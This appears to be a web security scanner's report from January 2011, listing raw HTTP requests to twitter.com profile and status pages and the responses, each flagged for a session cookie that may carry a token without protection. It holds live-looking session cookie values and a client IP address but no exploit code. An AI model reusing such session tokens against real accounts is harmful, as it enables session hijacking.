GET /LibertyHotel HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:54:03 GMT Server: hi Status: 200 OK X-Transaction: 1296266043-37638-22569 ETag: "6f06fb302d73fdde5809f33e541f4c86" Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT X-Runtime: 0.01451 Content-Type: text/html; charset=utf-8 Content-Length: 48481 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Michael_Joseph HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:25:39 GMT Server: hi Status: 200 OK X-Transaction: 1296224739-65021-17900 ETag: "4ee6993dd58f48089b6cdab2133559a8" Last-Modified: Fri, 28 Jan 2011 14:25:39 GMT X-Runtime: 0.01172 Content-Type: text/html; charset=utf-8 Content-Length: 51377 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Michael_Joseph/status/30390775099424770 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:37 GMT Server: hi Status: 200 OK X-Transaction: 1296224917-75373-44870 ETag: "7b489ae25bea2d0595afca259835fae7" Last-Modified: Fri, 28 Jan 2011 14:28:37 GMT X-Runtime: 0.04662 Content-Type: text/html; charset=utf-8 Content-Length: 13965 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwMzkwNzc1MDk5NDI0NzcwOgxjc3JmX2lkIiViNWFh%250AMzYyYjVlN2NkY2M5MjE1YzdhZjdkNjRhMzgwMjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--f1b68fb54f1b85d8151c7dd784fd1db4f27f519c; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Michael_Joseph/status/30750905452204032 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:34 GMT Server: hi Status: 200 OK X-Transaction: 1296224914-94525-23113 ETag: "83bfba4b5292333b01c60b5cd56ed6f4" Last-Modified: Fri, 28 Jan 2011 14:28:34 GMT X-Runtime: 0.04125 Content-Type: text/html; charset=utf-8 Content-Length: 13962 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzUwOTA1NDUyMjA0MDMyOgxjc3JmX2lkIiU2NGIz%250AM2Q5ODM3OTJkMzdhM2NmN2MyMTM0MTQwMWI1YjoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--541977a9c3c5e1a5a3320c2e55e9133173473f96; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Michael_Joseph/status/30790097846673409 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:28:33 GMT Server: hi Status: 200 OK X-Transaction: 1296224913-82080-4832 ETag: "f4090043902b6e990964220437113fcc" Last-Modified: Fri, 28 Jan 2011 14:28:33 GMT X-Runtime: 0.05956 Content-Type: text/html; charset=utf-8 Content-Length: 14049 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIj9odHRwOi8vdHdpdHRlci5jb20vTWljaGFlbF9K%250Ab3NlcGgvc3RhdHVzLzMwNzkwMDk3ODQ2NjczNDA5Ogxjc3JmX2lkIiU0ZTYz%250AMTFjMGI1MGExOTQ1ZDU1ZTJiMzY3YmViYjhmZDoHaWQiJTFjOTUzNDgxYTQy%250AZmRlOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9s%250AbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsAOg9jcmVhdGVkX2F0%250AbCsIM07wzC0B--3f3d222c37991f7c56cd273e7db3127271465e45; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /MittRomney HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:41:22 GMT Server: hi Status: 200 OK X-Transaction: 1296265282-38547-52668 ETag: "3107c6cc6c6978ff3b7722cbf52c2af6" Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT X-Runtime: 0.00731 Content-Type: text/html; charset=utf-8 Content-Length: 46527 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /NewYorkPost HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:13 GMT Server: hi Status: 200 OK X-Transaction: 1296265993-27588-50087 ETag: "e773df2d3a6b90bf31143c56a9f20c5d" Last-Modified: Sat, 29 Jan 2011 01:53:13 GMT X-Runtime: 0.01729 Content-Type: text/html; charset=utf-8 Content-Length: 53629 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Nicole_114 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:52:53 GMT Server: hi Status: 200 OK X-Transaction: 1296265973-31870-20101 ETag: "259b5389cc01f15bd18d06cca5332bd4" Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT X-Runtime: 0.01243 Content-Type: text/html; charset=utf-8 Content-Length: 47429 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /Oprah HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;
Response
HTTP/1.0 200 OK Date: Sat, 29 Jan 2011 01:53:50 GMT Server: hi Status: 200 OK X-Transaction: 1296266030-46156-5686 ETag: "857c98a5094f6af87e0d30eae77b7c6f" Last-Modified: Sat, 29 Jan 2011 01:53:50 GMT X-Runtime: 0.01844 Content-Type: text/html; charset=utf-8 Content-Length: 42735 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PageLines HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:04 GMT Server: hi Status: 200 OK X-Transaction: 1296225004-17515-51236 ETag: "24c45e2f38e6ae478c4805af9b36ff8e" Last-Modified: Fri, 28 Jan 2011 14:30:04 GMT X-Runtime: 0.01227 Content-Type: text/html; charset=utf-8 Content-Length: 51190 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /PageLines/status/27898822361354240 HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;
Response
HTTP/1.0 200 OK Date: Fri, 28 Jan 2011 14:30:07 GMT Server: hi Status: 200 OK X-Transaction: 1296225006-58314-38201 ETag: "57ff1e9c73248c6fb8e8d467c82b1909" Last-Modified: Fri, 28 Jan 2011 14:30:06 GMT X-Runtime: 0.07512 Content-Type: text/html; charset=utf-8 Content-Length: 13712 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vUGFnZUxpbmVz%250AL3N0YXR1cy8yNzg5ODgyMjM2MTM1NDI0MDoMY3NyZl9pZCIlMzc4NTRjMzAw%250AODE3YjBiNmI1MTM5ZjdiNDE2M2E1ZmU6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--8f776230b304f1b0fa1fdaa92cad95b801a77055; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
